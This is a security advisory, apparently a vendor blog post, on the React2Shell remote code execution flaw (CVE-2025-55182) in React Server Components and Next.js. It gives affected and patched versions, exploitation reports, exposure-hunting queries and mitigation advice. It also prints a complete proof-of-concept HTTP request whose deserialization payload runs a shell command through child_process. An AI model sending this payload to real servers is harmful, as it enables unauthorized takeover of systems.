React2Shell: Critical RCE Flaw (CVE-2025-55182)

Immediate Threat: React2Shell Hits the Wild

On December 3, the web development community was put on high alert with the disclosure of CVE-2025-55182, a critical vulnerability dubbed “React2Shell”. This is not a theoretical risk; it is an active, ongoing threat. With a maximum CVSS severity score of 10.0, React2Shell is a critical unauthenticated remote code execution (RCE) flaw impacting React Server Components (RSC).

The vulnerability stems from an insecure deserialization process within the "Flight" protocol used by RSC. This allows a remote, unauthenticated attacker to execute arbitrary code on the server simply by sending a specially crafted HTTP request to a Server Function endpoint. The barrier to entry for exploitation is dangerously low; the impact is total system compromise.

Active Exploitation and CISA Warning

The window between disclosure and exploitation was virtually non-existent. AWS researchers reported that China-nexus threat actors began weaponizing this flaw within 24 hours of its public disclosure. These attackers are targeting vulnerable cloud-hosted applications using RSC, often deploying web shells and persistent backdoors immediately after gaining initial access.

Recognizing the severity and active exploitation, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-55182 to its Known Exploited Vulnerabilities (KEV) Catalog on December 5. This mandates that federal agencies patch the flaw, signaling to all organizations the urgency required.

Vulnerability Details: CVE-2025-55182

Field	Description
CVE-ID	CVE-2025-55182 — CVSS 10.0 — Assigned by Facebook.
Vulnerability Description	React Server Components (RSC) and related packages improperly deserialize JSON payloads sent to Server Function endpoints. An unauthenticated attacker can supply a crafted payload via an HTTP request that causes the server to execute arbitrary JavaScript code, leading to full RCE.
Date of Disclosure	December 3, 2025
Affected Assets	Server‑side applications using React 19.x (RSC) including react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack, and frameworks that embed them like Next.js (App Router), React Router RSC preview, Waku, Vite RSC plugin, and RedwoodSDK.
Vulnerable Versions	React Packages: 19.0.0, 19.1.0, 19.1.1, and 19.2.0. Next.js: Versions ≥ 14.3.0-canary.77, all 15.x, and all 16.x (when using App Router).
PoC Available?	Yes; multiple public PoCs have been released. Exercise extreme caution, as fake or malware-infected PoCs are also circulating.
Exploitation Status	Actively Exploited. Amazon Threat Intelligence observed exploitation by China-aligned groups. CISA added it to the KEV catalog. GreyNoise has confirmed widespread scanning and exploitation attempts.
Patch Status	Patches are available. React: Update to 19.0.1, 19.1.2, or 19.2.1. Next.js: Update to 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, or 16.0.7.

Technical Analysis: The Exploit Payload

The exploit works by sending a multipart/form-data POST request. The payload contains a malformed JSON object that abuses the deserialization logic in React's server-side code to achieve prototype pollution, ultimately leading to code execution. The Next-Action header is a key indicator in requests targeting Next.js applications.

Here is a simplified example of a public Proof-of-Concept payload:

POST / HTTP/1.1
Host: vulnerable-app.com
User-Agent: Mozilla/5.0
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('id');","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

This payload instructs the server to execute the command id via child_process, a trivial demonstration of full server control.

Global Scope and Attack Surface

The adoption of React, Next.js, and Server Components is massive. Any internet-facing server running affected versions is a target. Security researchers have used search engines like Censys and Shodan to identify potentially vulnerable assets by looking for specific HTTP headers.

• Shodan: Over 380,000 assets match the query "Vary: RSC, Next-Router-State-Tree".
• Censys: Reports over 270,000 assets with similar headers.

🚨 Censys on #React2Shell (CVE-2025-55182): We observe ~2.15M exposed web services running Next.js or other RSC-based frameworks—mostly in the U.S. and China. Not all are vulnerable, but active exploitation is underway. Patch now.

The Flawtrack platform has already detected over 3,500 infected assets in Malaysia alone, indicating rapid and widespread compromise in the region.

Hunting and Mitigation

Security teams must assume they are vulnerable until proven otherwise. Immediate patching is the only effective remediation. If you cannot patch, consider taking affected applications offline or applying strict WAF rules to block requests containing signatures of exploit attempts, such as the Next-Action header combined with multipart form data.

To identify potentially vulnerable systems on your external attack surface, you can use queries that look for technology fingerprints:

services.http.response.headers: (key: `Vary` and value.headers: `RSC, Next-Router-State-Tree`)

For a more comprehensive search, Censys provides a detailed query to identify services using RSC or affected frameworks:

web.endpoints.http.headers: (key: "Content-Type" and value: "text/x-component") or web.endpoints.http.headers: (key: "Vary" and value: "RSC") or web.software.product:"next.js"

Your Next Steps

React2Shell is not a vulnerability to be monitored; it is one to be eliminated from your environment immediately.

1. Identify: Scan your entire software inventory and external attack surface for applications using React Server Components, Next.js, and other affected frameworks.
2. Patch: Immediately apply the security updates released by React and Next.js. Do not delay this process.
3. Verify: After patching, verify that the vulnerability has been remediated. Monitor logs for any indicators of compromise preceding the patch.

The widespread adoption of these technologies combined with the simplicity of the exploit makes this a perfect storm. The risk is high, the impact is critical, and attackers are not waiting. Contact Flawtrack for a comprehensive analysis of your attack surface to uncover and remediate exposures like React2Shell before they are exploited.